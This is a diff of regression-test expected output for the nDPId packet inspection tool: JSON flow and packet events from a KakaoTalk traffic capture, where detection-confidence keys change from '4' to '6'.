+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069022234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"thread_ts_msec":1430069022234,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGwb1wAANREBGgq8AQEKGFK8ADUjhgBYgN2QlYGAAAEAAgAAAAAEdXAtdgR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAFlwAPBHVwLXYEdGFsawJnbMAWwDEAAQABAAAAqwAE0mfwEA=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1430069022234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"thread_ts_msec":1430069022234,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGztegAANREvdgq8AQEKGFK8ADXd9ABYZqtud4GAAAEAAgAAAAAEdXAtYwR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAD8wAPBHVwLWMEdGFsawJnbMAWwDEAAQABAAAAeAAEbkyNVQ=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.85"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.85"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022249,"flow_last_seen":1430069022249,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022249,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1430069022249,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022249,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBcWUANQAtiQin1QEAAAEAAAAAAAAEdXAtYQR0YWxrBWtha2FvA2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022249,"flow_last_seen":1430069022249,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022249,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022249,"flow_last_seen":1430069022249,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022249,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1430069022252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":82,"pkt_l4_len":46,"thread_ts_msec":1430069022252,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEIAAEAAQBHSGgoYUrwKvAEBYh0ANQAu\/udwlQEAAAEAAAAAAAAFdXAtZ3AEdGFsawVrYWthbwNjb20AAAEAAQ=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1430069022252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022252,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBqEUANQAtOYa3iAEAAAEAAAAAAAAEZG4tbAR0YWxrBWtha2FvA2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1430069022282,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"thread_ts_msec":1430069022282,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGwb2AAANREBGQq8AQEKGFK8ADVxZQBYBjqn1YGAAAEAAgAAAAAEdXAtYQR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAFwgAPBHVwLWEEdGFsawJnbMAWwDEAAQABAAAARAAE0mfwEA=="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022282,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022282,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1430069022295,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":97,"pkt_l4_len":61,"thread_ts_msec":1430069022295,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAFHtewAANREvkAq8AQEKGFK8ADWoRQA9yiS3iIGAAAEAAQAAAAAEZG4tbAR0YWxrBWtha2FvA2NvbQAAAQABwAwAAQABAAAEOQAEbkyNVg=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.86"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.86"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1430069022295,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":126,"pkt_l4_len":90,"thread_ts_msec":1430069022295,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAG4b2QAANREBFgq8AQEKGFK8ADViHQBaJnpwlYGAAAEAAgAAAAAFdXAtZ3AEdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAABasAEAV1cC1ncAR0YWxrAmdswBfAMgABAAEAAACsAARuTI0a"} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.26"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.26"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022297,"flow_last_seen":1430069022297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069022297,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069022297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022297,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzzVkAAPwZJoAoYUrxn9jn7x00fkMsN9JkAAAAAoAI5CGIPAAACBAV4BAIICgALB88AAAAAAQMDBw=="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069022411,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022411,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQZO92f2OfsKGFK8H5DHTSs\/AzbLDfSaoBIWoGVTAAACBAV4BAIICpj2V6UACwfPAQMDCQ=="} @@ -72,85 +72,85 @@ 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069026370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069026370,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmtkAAPwbpMgoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCGaAAACBAV4BAIICgALCWYAAAAAAQMDBw=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1430069027366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069027366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmt0AAPwbpMQoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCE2AAACBAV4BAIICgALCcoAAAAAAQMDBw=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1430069027408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069027408,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACyOBEAA+AaI9K38YQIKGFK8AbuKr2Aiq0X8Gu\/RYBIRHJekAAACBAV4"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069028075,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069028075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069028075,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgUEEAA+AZ+3XgcGvIKGFK8AFCGx0Ds0yKXy0vyUBQAAEEKAAA="} 